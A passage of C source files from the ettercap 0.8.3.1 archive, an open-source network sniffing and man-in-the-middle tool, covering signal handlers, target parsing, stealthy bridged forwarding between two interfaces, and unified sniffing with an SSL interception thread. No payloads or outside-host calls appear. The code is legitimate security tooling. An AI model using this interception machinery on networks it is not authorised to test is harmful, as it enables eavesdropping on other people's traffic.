#ifdef SIGTTOU /* allow the user to type "ettercap .. &" */ signal_handle(SIGTTOU, SIG_IGN, 0); #endif #ifdef SIGTTIN signal_handle(SIGTTIN, SIG_IGN, 0); #endif #ifdef SIGUSR1 signal_handle(SIGUSR1, signal_USR1, 0); #endif } static handler_t *signal_handle(int signo, handler_t *handler, int flags) { #ifdef OS_WINDOWS handler_t *old = signal (signo, handler); /* avoid "unused variable" warning */ (void)flags; return (old); #else struct sigaction act, old_act; act.sa_handler = handler; /* don't permit nested signal handling */ sigfillset(&act.sa_mask); act.sa_flags = flags; if (sigaction(signo, &act, &old_act) < 0) ERROR_MSG("sigaction() failed"); return (old_act.sa_handler); #endif } /* * received when something goes wrong ;) */ static void signal_SEGV(int sig) { #ifdef DEBUG #ifndef OS_WINDOWS struct rlimit corelimit = {RLIM_INFINITY, RLIM_INFINITY}; #endif #ifdef SIGBUS if (sig == SIGBUS) DEBUG_MSG(" !!! BUS ERROR !!!"); else #endif DEBUG_MSG(" !!! SEGMENTATION FAULT !!!"); ui_cleanup(); fprintf (stderr, "\n"EC_COLOR_YELLOW"Ooops !! This shouldn't happen...\n\n"EC_COLOR_END); #ifdef SIGBUS if (sig == SIGBUS) fprintf (stderr, EC_COLOR_RED"Bus error...\n\n"EC_COLOR_END); else #endif fprintf (stderr, EC_COLOR_RED"Segmentation Fault...\n\n"EC_COLOR_END); fprintf (stderr, "===========================================================================\n"); fprintf (stderr, " To report this error follow these steps:\n\n"); fprintf (stderr, " 1) set ec_uid to 0 (so the core will be dumped)\n\n"); fprintf (stderr, " 2) execute ettercap with \"-w debug_dump.pcap\"\n\n"); fprintf (stderr, " 3) reproduce the critical situation\n\n"); fprintf (stderr, " 4) make a report : \n\t\"tar zcvf error.tar.gz %s-%s_debug.log debug_dump.pcap\"\n\n", PROGRAM, EC_VERSION); fprintf (stderr, " 5) get the gdb backtrace :\n" " \t - \"gdb %s core\"\n" " \t - at the gdb prompt \"bt\"\n" " \t - at the gdb prompt \"quit\" and return to the shell\n" " \t - copy and paste this output.\n\n", PROGRAM); fprintf (stderr, " 6) mail us the output of gdb and the error.tar.gz\n"); fprintf (stderr, "============================================================================\n"); fprintf (stderr, EC_COLOR_CYAN"\n Core dumping... (use the 'core' file for gdb analysis)\n\n"EC_COLOR_END); #ifdef HAVE_EC_LUA fprintf (stderr, EC_COLOR_CYAN" Lua stack trace: \n"EC_COLOR_END); // Let's try to print the lua stack trace, maybe. ec_lua_print_stack(stderr); fprintf (stderr, "\n"); #endif fprintf (stderr, EC_COLOR_YELLOW" Have a nice day!\n"EC_COLOR_END); /* force the coredump */ #ifndef OS_WINDOWS setrlimit(RLIMIT_CORE, &corelimit); #endif signal(sig, SIG_DFL); raise(sig); #else ui_cleanup(); fprintf(stderr, EC_COLOR_YELLOW"Ooops ! This shouldn't happen...\n"EC_COLOR_END); #ifdef SIGBUS if (sig == SIGBUS) fprintf (stderr, EC_COLOR_RED"Bus error...\n\n"EC_COLOR_END); else #endif fprintf (stderr, EC_COLOR_RED"Segmentation Fault...\n\n"EC_COLOR_END); fprintf(stderr, "Please recompile in debug mode, reproduce the bug and send a bugreport\n\n"); fprintf (stderr, EC_COLOR_YELLOW" Have a nice day!\n"EC_COLOR_END); clean_exit(666); #endif } /* * received on CTRL+C or SIGTERM */ static void signal_TERM(int sig) { #ifdef HAVE_STRSIGNAL DEBUG_MSG("Signal handler... (caught SIGNAL: %d) | %s", sig, strsignal(sig)); #else DEBUG_MSG("Signal handler... (caught SIGNAL: %d)", sig); #endif /* terminate the UI */ ui_cleanup(); if (sig == SIGINT) { fprintf(stderr, "\n\nUser requested a CTRL+C... (deprecated, next time use proper shutdown)\n\n"); } else { #ifdef HAVE_STRSIGNAL fprintf(stderr, "\n\n Shutting down %s (received SIGNAL: %d | %s)\n\n", PROGRAM, sig, strsignal(sig)); #else fprintf(stderr, "\n\n Shutting down %s (received SIGNAL: %d)\n\n", PROGRAM, sig); #endif } signal(sig, SIG_IGN); /* flush and close the log file */ log_stop(); /* make sure we exit gracefully */ clean_exit(0); } /* * received when a child exits */ static void signal_CHLD(int sig) { /* variable not used */ (void) sig; #ifndef OS_WINDOWS int stat; /* wait for the child to return and not become a zombie */ while (waitpid (-1, &stat, WNOHANG) > 0); #endif } static void signal_USR1(int sig) { /* variable not used */ (void) sig; /* nothing to do by signal handler */ } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_sleep.c000664 000000 000000 00000002506 13711276346 016177 0ustar00rootroot000000 000000 /* ettercap -- sleep / timer functions Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* this function is used to unify *sleep calls within ettercap */ void ec_usleep(unsigned int usecs) { #ifndef OS_WINDOWS struct timespec ts; ts.tv_sec = MICRO2SEC(usecs); ts.tv_nsec = MICRO2NANO((usecs % (SEC2MICRO(1)))); nanosleep(&ts, NULL); #else /* * Use SleepEx() instead: * http://msdn.microsoft.com/library/windows/desktop/ms686307.aspx */ DWORD msecs = usecs / 1000; SleepEx (msecs, FALSE); #endif } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_sniff.c000664 000000 000000 00000044427 13711276346 016204 0ustar00rootroot000000 000000 /* ettercap -- sniffing method module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include /* proto */ static void set_interesting_flag(struct packet_object *po); void set_forwardable_flag(struct packet_object *po); static void add_port(void *ports, u_int n); static void add_ip(void *digit, u_int n); static int expand_range_ip(char *str, void *target); #ifdef WITH_IPV6 static int expand_ipv6(char *str, struct target_env *target); #endif static pthread_mutex_t ip_list_mutex = PTHREAD_MUTEX_INITIALIZER; #define IP_LIST_LOCK do{ pthread_mutex_lock(&ip_list_mutex); } while(0) #define IP_LIST_UNLOCK do{ pthread_mutex_unlock(&ip_list_mutex); } while(0) #ifdef WITH_IPV6 static pthread_mutex_t ip6_list_mutex = PTHREAD_MUTEX_INITIALIZER; #define IP6_LIST_LOCK do{ pthread_mutex_lock(&ip6_list_mutex); } while(0) #define IP6_LIST_UNLOCK do{ pthread_mutex_unlock(&ip6_list_mutex); } while(0) #endif /*******************************************/ void set_sniffing_method(struct sniffing_method *sm) { /* set the method and all its pointer */ memcpy(EC_GBL_SNIFF, sm, sizeof(struct sniffing_method)); /* on startup it is not active */ EC_GBL_SNIFF->active = 0; } /* * classic sniffing method. * based on IP and MAC filtering */ void set_unified_sniff(void) { struct sniffing_method sm; DEBUG_MSG("set_unified_sniff"); sm.type = SM_UNIFIED; sm.start = &start_unified_sniff; sm.cleanup = &stop_unified_sniff; sm.check_forwarded = &unified_check_forwarded; sm.set_forwardable = &unified_set_forwardable; /* unified forwarding is done at layer 3 */ sm.forward = &forward_unified_sniff; sm.interesting = &set_interesting_flag; set_sniffing_method(&sm); } /* * bridged sniffing method. * it uses two network interfaces and * it is totally stealthy */ void set_bridge_sniff(void) { struct sniffing_method sm; DEBUG_MSG("set_bridge_sniff"); sm.type = SM_BRIDGED; sm.start = &start_bridge_sniff; sm.cleanup = &stop_bridge_sniff; sm.check_forwarded = &bridge_check_forwarded; sm.set_forwardable = &bridge_set_forwardable; sm.forward = &forward_bridge_sniff; sm.interesting = &set_interesting_flag; set_sniffing_method(&sm); } /* * set the PO_IGNORE based on the * TARGETS specified on command line */ static void set_interesting_flag(struct packet_object *po) { char value = 0; char good = 0; char proto = 0; /* * first check the protocol. * if it is not the one specified it is * useless to parse the mac, ip and port */ if (!EC_GBL_OPTIONS->proto || !strcasecmp(EC_GBL_OPTIONS->proto, "all")) proto = 1; else { if (EC_GBL_OPTIONS->proto && !strcasecmp(EC_GBL_OPTIONS->proto, "tcp") && po->L4.proto == NL_TYPE_TCP) proto = 1; if (EC_GBL_OPTIONS->proto && !strcasecmp(EC_GBL_OPTIONS->proto, "udp") && po->L4.proto == NL_TYPE_UDP) proto = 1; } /* the protocol does not match */ if (!EC_GBL_OPTIONS->reversed && proto == 0) return; /* * we have to check if the packet is complying with the TARGETS * specified by the users. * * 1) also accept the packet if the destination mac address is equal * to the attacker mac address. this is because we need to sniff * during mitm attacks and in the target specification you select * the real mac address... * * 2) to sniff thru a gateway, accept also the packet if it has non local * ip address. * */ /* FROM TARGET1 TO TARGET2 */ /* T1.mac == src & T1.ip = src & T1.port = src */ if ( (EC_GBL_TARGET1->all_mac || !memcmp(EC_GBL_TARGET1->mac, po->L2.src, MEDIA_ADDR_LEN)) && (EC_GBL_TARGET1->all_ip || cmp_ip_list(&po->L3.src, EC_GBL_TARGET1) || (EC_GBL_OPTIONS->remote && ip_addr_is_local(&po->L3.src, NULL) != E_SUCCESS) ) && (EC_GBL_TARGET1->all_port || BIT_TEST(EC_GBL_TARGET1->ports, ntohs(po->L4.src))) ) value = 1; /* T2.mac == dst & T2.ip = dst & T2.port = dst */ if ( value && ( (EC_GBL_TARGET2->all_mac || !memcmp(EC_GBL_TARGET2->mac, po->L2.dst, MEDIA_ADDR_LEN) || !memcmp(EC_GBL_IFACE->mac, po->L2.dst, MEDIA_ADDR_LEN)) && (EC_GBL_TARGET2->all_ip || cmp_ip_list(&po->L3.dst, EC_GBL_TARGET2) || (EC_GBL_OPTIONS->broadcast && ip_addr_is_broadcast(&po->L3.dst) == E_SUCCESS) || (EC_GBL_OPTIONS->remote && ip_addr_is_local(&po->L3.dst, NULL) != E_SUCCESS) ) && (EC_GBL_TARGET2->all_port || BIT_TEST(EC_GBL_TARGET2->ports, ntohs(po->L4.dst))) ) ) good = 1; /* * reverse the matching but only if it has matched ! * if good && proto is false, we have to go on with * tests and evaluate it later */ if ((good && proto) && EC_GBL_OPTIONS->reversed ^ (good && proto) ) { po->flags &= ~PO_IGNORE; return; } value = 0; /* FROM TARGET2 TO TARGET1 */ /* T1.mac == dst & T1.ip = dst & T1.port = dst */ /* if broadcast then T2 -> broadcast */ if ( (EC_GBL_TARGET1->all_mac || !memcmp(EC_GBL_TARGET1->mac, po->L2.dst, MEDIA_ADDR_LEN) || !memcmp(EC_GBL_IFACE->mac, po->L2.dst, MEDIA_ADDR_LEN)) && (EC_GBL_TARGET1->all_ip || cmp_ip_list(&po->L3.dst, EC_GBL_TARGET1) || (EC_GBL_OPTIONS->broadcast && ip_addr_is_broadcast(&po->L3.dst) == E_SUCCESS) || (EC_GBL_OPTIONS->remote && ip_addr_is_local(&po->L3.dst, NULL) != E_SUCCESS) ) && (EC_GBL_TARGET1->all_port || BIT_TEST(EC_GBL_TARGET1->ports, ntohs(po->L4.dst))) ) value = 1; /* T2.mac == src & T2.ip = src & T2.port = src */ if ( value && ( (EC_GBL_TARGET2->all_mac || !memcmp(EC_GBL_TARGET2->mac, po->L2.src, MEDIA_ADDR_LEN)) && (EC_GBL_TARGET2->all_ip || cmp_ip_list(&po->L3.src, EC_GBL_TARGET2) || (EC_GBL_OPTIONS->remote && ip_addr_is_local(&po->L3.src, NULL) != E_SUCCESS) ) && (EC_GBL_TARGET2->all_port || BIT_TEST(EC_GBL_TARGET2->ports, ntohs(po->L4.src))) ) ) good = 1; /* reverse the matching */ if (EC_GBL_OPTIONS->reversed ^ (good && proto) ) { po->flags &= ~PO_IGNORE; } return; } /* * set the filter to ANY/ANY/ANY */ void reset_display_filter(struct target_env *t) { DEBUG_MSG("reset_display_filter %p", t); free_ip_list(t); memset(t->ports, 0, sizeof(t->ports)); memset(t->mac, 0, sizeof(t->mac)); t->all_mac = 1; t->all_ip = 1; t->all_ip6 = 1; t->all_port = 1; t->scan_all = 0; } /* * compile the list of MAC, IPs and PORTs to be displayed */ int compile_display_filter(void) { char *t1, *t2; #ifdef WITH_IPV6 /* if not specified default to /// */ if (!EC_GBL_OPTIONS->target1) { EC_GBL_OPTIONS->target1 = strdup("///"); EC_GBL_TARGET1->scan_all = 1; } /* if /// was specified, select all */ else if (!strncmp(EC_GBL_OPTIONS->target1, "///", 3) && strlen(EC_GBL_OPTIONS->target1) == 3) EC_GBL_TARGET1->scan_all = 1; /* if not specified default to /// */ if (!EC_GBL_OPTIONS->target2) { EC_GBL_OPTIONS->target2 = strdup("///"); EC_GBL_TARGET2->scan_all = 1; } /* if /// was specified, select all */ else if (!strncmp(EC_GBL_OPTIONS->target2, "///", 3) && strlen(EC_GBL_OPTIONS->target2) == 3) EC_GBL_TARGET2->scan_all = 1; #else /* if not specified default to // */ if (!EC_GBL_OPTIONS->target1) { EC_GBL_OPTIONS->target1 = strdup("//"); EC_GBL_TARGET1->scan_all = 1; } /* if // was specified, select all */ else if (!strncmp(EC_GBL_OPTIONS->target1, "//", 2) && strlen(EC_GBL_OPTIONS->target1) == 2) EC_GBL_TARGET1->scan_all = 1; /* if not specified default to // */ if (!EC_GBL_OPTIONS->target2) { EC_GBL_OPTIONS->target2 = strdup("//"); EC_GBL_TARGET2->scan_all = 1; } /* if // was specified, select all */ else if (!strncmp(EC_GBL_OPTIONS->target2, "//", 2) && strlen(EC_GBL_OPTIONS->target2) == 2) EC_GBL_TARGET2->scan_all = 1; #endif /* make a copy to operate on */ t1 = strdup(EC_GBL_OPTIONS->target1); t2 = strdup(EC_GBL_OPTIONS->target2); /* compile TARGET1 */ compile_target(t1, EC_GBL_TARGET1); /* compile TARGET2 */ compile_target(t2, EC_GBL_TARGET2); /* the strings were modified, we can't use them anymore */ SAFE_FREE(t1); SAFE_FREE(t2); return E_SUCCESS; } /* * convert a string into a target env */ int compile_target(char *string, struct target_env *target) { #define MAC_TOK 0 #define IP_TOK 1 #ifdef WITH_IPV6 #define IPV6_TOK 2 #define PORT_TOK 3 #define MAX_TOK 4 #else #define PORT_TOK 2 #define MAX_TOK 3 #endif char valid[] = "1234567890/.,-;:ABCDEFabcdef"; char *tok[MAX_TOK]; char *p; int i = 0; DEBUG_MSG("compile_target TARGET: %s", string); /* reset the special marker */ target->all_mac = 0; target->all_ip = 0; target->all_ip6 = 0; target->all_port = 0; /* check for invalid char */ if (strlen(string) != strspn(string, valid)) SEMIFATAL_ERROR("TARGET (%s) contains invalid chars !", string); /* TARGET parsing */ for (p = strsep(&string, "/"); p != NULL; p = strsep(&string, "/")) { tok[i++] = strdup(p); /* bad parsing */ if (i > (MAX_TOK - 1)) break; } if (i != MAX_TOK) #ifdef WITH_IPV6 SEMIFATAL_ERROR("Incorrect number of token (///) in TARGET !!"); #else SEMIFATAL_ERROR("Incorrect number of token (//) in TARGET !!"); #endif DEBUG_MSG("MAC : [%s]", tok[MAC_TOK]); DEBUG_MSG("IP : [%s]", tok[IP_TOK]); #ifdef WITH_IPV6 DEBUG_MSG("IPv6 : [%s]", tok[IPV6_TOK]); #endif DEBUG_MSG("PORT : [%s]", tok[PORT_TOK]); /* set the mac address */ if (!strcmp(tok[MAC_TOK], "")) target->all_mac = 1; else if (mac_addr_aton(tok[MAC_TOK], target->mac) == 0) SEMIFATAL_ERROR("Incorrect TARGET MAC parsing... (%s)", tok[MAC_TOK]); /* parse the IP range */ if (!strcmp(tok[IP_TOK], "")) target->all_ip = 1; else for(p = strsep(&tok[IP_TOK], ";"); p != NULL; p = strsep(&tok[IP_TOK], ";")) expand_range_ip(p, target); #ifdef WITH_IPV6 if(!strcmp(tok[IPV6_TOK], "")) target->all_ip6 = 1; else for(p = strsep(&tok[IPV6_TOK], ";"); p != NULL; p = strsep(&tok[IPV6_TOK], ";")) expand_ipv6(p, target); #endif /* * expand the range into the port bitmap array * 1<<16 is MAX_PORTS */ if (!strcmp(tok[PORT_TOK], "")) target->all_port = 1; else { if (expand_token(tok[PORT_TOK], 1<<16, &add_port, target->ports) == -E_FATAL) SEMIFATAL_ERROR("Invalid port range"); } for(i = 0; i < MAX_TOK; i++) SAFE_FREE(tok[i]); return E_SUCCESS; } /* * set the bit of the relative port */ static void add_port(void *ports, u_int n) { u_int8 *bitmap = ports; if (n > 1<<16) FATAL_ERROR("Port outside the range (65535) !!"); BIT_SET(bitmap, n); } /* * this structure is used to contain all the possible * value of a token. * it is used as a digital clock. * an impulse is made to the last digit and it increment * its value, when it reach the maximum, it reset itself * and gives an impulse to the second to last digit. * the impulse is propagated till the first digit so all * the values are displayed as in a daytime from 00:00 to 23:59 */ struct digit { int n; int cur; u_char values[0xff]; }; /* * prepare the set of 4 digit to create an IP address */ static int expand_range_ip(char *str, void *target) { struct digit ADDR[4]; struct ip_addr tmp; char *addr[4]; char parsed_ip[16]; char *p, *q; int i = 0, j; int permut = 1; char *tok; memset(&ADDR, 0, sizeof(ADDR)); p = str; /* tokenize the ip into 4 slices */ while ((q = ec_strtok(p, ".", &tok)) ) { addr[i++] = strdup(q); /* reset p for the next strtok */ if (p != NULL) p = NULL; if (i > 3) break; } if (i != 4) FATAL_ERROR("Invalid IP format !!"); DEBUG_MSG("expand_range_ip -- [%s] [%s] [%s] [%s]", addr[0], addr[1], addr[2], addr[3]); for (i = 0; i < 4; i++) { p = addr[i]; if (expand_token(addr[i], 255, &add_ip, &ADDR[i]) == -E_FATAL) SEMIFATAL_ERROR("Invalid port range"); } /* count the free permutations */ for (i = 0; i < 4; i++) permut *= ADDR[i].n; /* give the impulses to the last digit */ for (i = 0; i < permut; i++) { snprintf(parsed_ip, 16, "%d.%d.%d.%d", ADDR[0].values[ADDR[0].cur], ADDR[1].values[ADDR[1].cur], ADDR[2].values[ADDR[2].cur], ADDR[3].values[ADDR[3].cur]); if (ip_addr_pton(parsed_ip, &tmp) != E_SUCCESS) FATAL_ERROR("Invalid IP address (%s)", parsed_ip); add_ip_list(&tmp, target); /* give the impulse to the last octet */ ADDR[3].cur++; /* adjust the other digits as in a digital clock */ for (j = 2; j >= 0; j--) { if ( ADDR[j+1].cur >= ADDR[j+1].n ) { ADDR[j].cur++; ADDR[j+1].cur = 0; } } } for (i = 0; i < 4; i++) SAFE_FREE(addr[i]); return E_SUCCESS; } #ifdef WITH_IPV6 /* Adds IPv6 address to the target list */ static int expand_ipv6(char *str, struct target_env *target) { struct ip_addr ip; if(ip_addr_pton(str, &ip) != E_SUCCESS) SEMIFATAL_ERROR("Invalid IPv6 address"); add_ip_list(&ip, target); return E_SUCCESS; } #endif /* fill the digit structure with data */ static void add_ip(void *digit, u_int n) { struct digit *buf = digit; buf->n++; buf->values[buf->n - 1] = (u_char) n; } /* * add an IP to the list */ void add_ip_list(struct ip_addr *ip, struct target_env *t) { struct ip_list *e; struct ip_list *last; SAFE_CALLOC(e, 1, sizeof(struct ip_list)); memcpy(&e->ip, ip, sizeof(struct ip_addr)); switch(ntohs(ip->addr_type)) { case AF_INET: IP_LIST_LOCK; /* * insert it at the end of the list. * search the last element then insert the new one */ LIST_FOREACH (last, &t->ips, next) { /* if already in the list, skip it */ if (!ip_addr_cmp(&last->ip, ip)) { IP_LIST_UNLOCK; return; } if (LIST_NEXT(last, next) == LIST_END(&t->ips)) break; } if (last) LIST_INSERT_AFTER(last, e, next); else LIST_INSERT_HEAD(&t->ips, e, next); /* the target has at least one ip, so remove the "all" flag */ t->all_ip = 0; t->scan_all = 0; IP_LIST_UNLOCK; break; #ifdef WITH_IPV6 case AF_INET6: IP6_LIST_LOCK; LIST_FOREACH(last, &t->ip6, next) { if(!ip_addr_cmp(&last->ip, ip)) { IP6_LIST_UNLOCK; return; } if(LIST_NEXT(last, next) == LIST_END(&t->ip6)) break; } if(last) LIST_INSERT_AFTER(last, e, next); else LIST_INSERT_HEAD(&t->ip6, e, next); t->all_ip6 = 0; t->scan_all = 0; IP6_LIST_UNLOCK; break; #endif } return; } /* * return true if the ip is in the list */ int cmp_ip_list(struct ip_addr *ip, struct target_env *t) { struct ip_list *e; switch(ntohs(ip->addr_type)) { case AF_INET: IP_LIST_LOCK; LIST_FOREACH (e, &t->ips, next) if (!ip_addr_cmp(&(e->ip), ip)) { IP_LIST_UNLOCK; return 1; } IP_LIST_UNLOCK; break; #ifdef WITH_IPV6 case AF_INET6: IP6_LIST_LOCK; LIST_FOREACH(e, &t->ip6, next) if(!ip_addr_cmp(&e->ip, ip)) { IP6_LIST_UNLOCK; return 1; } IP6_LIST_UNLOCK; break; #endif } return 0; } /* * remove an IP from the list */ void del_ip_list(struct ip_addr *ip, struct target_env *t) { struct ip_list *e; switch(ntohs(ip->addr_type)) { case AF_INET: IP_LIST_LOCK; LIST_FOREACH (e, &t->ips, next) { if (!ip_addr_cmp(&(e->ip), ip)) { LIST_REMOVE(e, next); SAFE_FREE(e); /* check if the list is empty */ if (LIST_FIRST(&t->ips) == LIST_END(&t->ips)) { /* the list is empty, set the "all" flag */ t->all_ip = 1; } IP_LIST_UNLOCK; return; } } IP_LIST_UNLOCK; break; #ifdef WITH_IPV6 case AF_INET6: IP6_LIST_LOCK; LIST_FOREACH(e, &t->ip6, next) { if(!ip_addr_cmp(&e->ip, ip)) { LIST_REMOVE(e, next); SAFE_FREE(e); if(LIST_FIRST(&t->ip6) == LIST_END(&t->ip6)) t->all_ip6 = 1; IP6_LIST_UNLOCK; return; } } IP6_LIST_UNLOCK; break; #endif } return; } /* * free the IP list */ void free_ip_list(struct target_env *t) { struct ip_list *e, *tmp; IP_LIST_LOCK; /* delete the list */ LIST_FOREACH_SAFE(e, &t->ips, next, tmp) { LIST_REMOVE(e, next); SAFE_FREE(e); } IP_LIST_UNLOCK; #ifdef WITH_IPV6 IP6_LIST_LOCK; LIST_FOREACH_SAFE(e, &t->ip6, next, tmp) { LIST_REMOVE(e, next); SAFE_FREE(e); } IP6_LIST_UNLOCK; #endif } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_sniff_bridge.c000664 000000 000000 00000013446 13711276346 017515 0ustar00rootroot000000 000000 /* ettercap -- bridged sniffing method module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include struct origin_mac_table { u_int8 mac[MEDIA_ADDR_LEN]; LIST_ENTRY(origin_mac_table) next; }; static LIST_HEAD(, origin_mac_table) iface_origin_table; static LIST_HEAD(, origin_mac_table) bridge_origin_table; /* proto */ void start_bridge_sniff(void); void stop_bridge_sniff(void); void forward_bridge_sniff(struct packet_object *po); void bridge_check_forwarded(struct packet_object *po); void bridge_set_forwardable(struct packet_object *po); /*******************************************/ void start_bridge_sniff(void) { DEBUG_MSG("start_bridge_sniff"); if (EC_GBL_SNIFF->active == 1) { USER_MSG("Bridged sniffing already started...\n"); return; } USER_MSG("Starting Bridged sniffing...\n\n"); /* create the timeouter thread */ if (!EC_GBL_OPTIONS->read) { pthread_t pid; pid = ec_thread_getpid("timer"); if (pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_new("timer", "conntrack timeouter", &conntrack_timeouter, NULL); } /* create the thread for packet capture */ capture_start(EC_GBL_IFACE); /* create the thread for packet capture on the bridged interface */ capture_start(EC_GBL_BRIDGE); EC_GBL_SNIFF->active = 1; } /* * kill the capturing threads, but leave untouched the others */ void stop_bridge_sniff(void) { DEBUG_MSG("stop_bridge_sniff"); if (EC_GBL_SNIFF->active == 0) { USER_MSG("Bridged sniffing is not running...\n"); return; } /* kill it */ capture_stop(EC_GBL_IFACE); capture_stop(EC_GBL_BRIDGE); USER_MSG("Bridged sniffing was stopped.\n"); EC_GBL_SNIFF->active = 0; } void forward_bridge_sniff(struct packet_object *po) { /* don't forward dropped packets */ if (po->flags & PO_DROPPED) return; /* * If the filters modified the packet len * recalculate it (only if some L3 decoder parsed it). */ if (po->fwd_packet) po->len = po->L2.len + po->fwd_len; /* * send the packet to the other interface. * the socket was opened during the initialization * phase (parameters parsing) by bridge_init() */ if (po->flags & PO_FROMIFACE) send_to_bridge(po); else if (po->flags & PO_FROMBRIDGE) send_to_L2(po); } /* * keep a list of source mac addresses for each interface. * each list will contain mac address coming form an host connected * on the iface. * we can determine if a packet is forwarded or not searching it in * the lists. */ void bridge_check_forwarded(struct packet_object *po) { struct origin_mac_table *omt; u_char tmp[MAX_ASCII_ADDR_LEN]; /* avoid gcc complaining for unused var */ (void)tmp; if (po->flags & PO_FROMIFACE) { /* search the mac in the iface table */ LIST_FOREACH(omt, &iface_origin_table, next) if (!memcmp(omt->mac, po->L2.src, MEDIA_ADDR_LEN)) return; /* * now search it in the opposite table * if it was registered there, the packet is forwarded */ LIST_FOREACH(omt, &bridge_origin_table, next) if (!memcmp(omt->mac, po->L2.src, MEDIA_ADDR_LEN)) { po->flags |= PO_FORWARDED; return; } } if (po->flags & PO_FROMBRIDGE) { /* search the mac in the bridge table */ LIST_FOREACH(omt, &bridge_origin_table, next) if (!memcmp(omt->mac, po->L2.src, MEDIA_ADDR_LEN)) return; /* * now search it in the opposite table * if it was registered there, the packet is forwarded */ LIST_FOREACH(omt, &iface_origin_table, next) if (!memcmp(omt->mac, po->L2.src, MEDIA_ADDR_LEN)) { po->flags |= PO_FORWARDED; return; } } /* allocate a new entry for the newly discovered mac address */ SAFE_CALLOC(omt, 1, sizeof(struct origin_mac_table)); memcpy(omt->mac, po->L2.src, MEDIA_ADDR_LEN); /* insert the new mac address in the proper list */ if (po->flags & PO_FROMIFACE) { DEBUG_MSG("Added the mac [%s] to IFACE table", mac_addr_ntoa(po->L2.src, tmp)); LIST_INSERT_HEAD(&iface_origin_table, omt, next); } if (po->flags & PO_FROMBRIDGE) { DEBUG_MSG("Added the mac [%s] to BRIDGE table", mac_addr_ntoa(po->L2.src, tmp)); LIST_INSERT_HEAD(&bridge_origin_table, omt, next); } } /* * in bridged sniffing all the packet must be forwarded * on the other iface */ void bridge_set_forwardable(struct packet_object *po) { /* If for us on the iface */ if ( !memcmp(EC_GBL_IFACE->mac, po->L2.src, MEDIA_ADDR_LEN) || !memcmp(EC_GBL_IFACE->mac, po->L2.dst, MEDIA_ADDR_LEN) ) return; /* If for us on the bridge */ if ( !memcmp(EC_GBL_BRIDGE->mac, po->L2.src, MEDIA_ADDR_LEN) || !memcmp(EC_GBL_BRIDGE->mac, po->L2.dst, MEDIA_ADDR_LEN) ) return; /* in bridged sniffing all the packet have to be forwarded */ po->flags |= PO_FORWARDABLE; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_sniff_unified.c000664 000000 000000 00000012010 13711276346 017666 0ustar00rootroot000000 000000 /* ettercap -- unified sniffing method module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include /* proto */ void start_unified_sniff(void); void stop_unified_sniff(void); void forward_unified_sniff(struct packet_object *po); void unified_check_forwarded(struct packet_object *po); void unified_set_forwardable(struct packet_object *po); /*******************************************/ /* * creates the threads for capturing */ void start_unified_sniff(void) { DEBUG_MSG("start_unified_sniff"); if (EC_GBL_SNIFF->active == 1) { USER_MSG("Unified sniffing already started...\n"); return; } USER_MSG("Starting Unified sniffing...\n\n"); /* create the timeouter thread */ if (!EC_GBL_OPTIONS->read) { pthread_t pid; pid = ec_thread_getpid("timer"); if (pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_new("timer", "conntrack timeouter", &conntrack_timeouter, NULL); } /* create the thread for packet capture */ capture_start(EC_GBL_IFACE); if(EC_GBL_OPTIONS->secondary) secondary_sources_foreach(capture_start); /* start ssl_wrapper thread */ if (!EC_GBL_OPTIONS->read && !EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->only_mitm && EC_GBL_OPTIONS->ssl_mitm) ec_thread_new("sslwrap", "wrapper for ssl connections", &sslw_start, NULL); EC_GBL_SNIFF->active = 1; } /* * kill the capturing threads, but leave untouched the others */ void stop_unified_sniff(void) { pthread_t pid; DEBUG_MSG("stop_unified_sniff"); if (EC_GBL_SNIFF->active == 0) { USER_MSG("Unified sniffing is not running...\n"); return; } /* kill it */ capture_stop(EC_GBL_IFACE); if(EC_GBL_OPTIONS->secondary) secondary_sources_foreach(capture_stop); pid = ec_thread_getpid("sslwrap"); if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); USER_MSG("Unified sniffing was stopped.\n"); EC_GBL_SNIFF->active = 0; } void forward_unified_sniff(struct packet_object *po) { /* if it was not initialized, no packet are forwardable */ switch(ntohs(po->L3.proto)) { case LL_TYPE_IP: if(!EC_GBL_LNET->lnet_IP4) return; 